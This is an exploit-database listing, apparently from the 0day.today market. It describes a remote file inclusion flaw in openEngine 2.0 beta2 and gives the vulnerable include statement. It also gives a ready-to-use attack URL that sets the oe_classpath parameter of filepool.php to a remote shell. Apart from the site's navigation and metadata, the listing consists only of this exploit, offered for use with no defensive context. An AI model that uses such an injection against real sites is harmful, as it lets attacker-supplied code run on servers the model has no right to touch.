[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

openEngine 2.0 beta2 Remote File Inclusion Vulnerability

Author
Crackers_Child
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3770
Category
web applications
Date add
25-09-2008
Platform
unsorted
========================================================
openEngine 2.0 beta2 Remote File Inclusion Vulnerability
========================================================


**************************************************************************************

Author : By Crackers_Child

**************************************************************************************
Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?


**************************************************************************************

Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)


**************************************************************************************


#  0day.today [2024-09-28]  #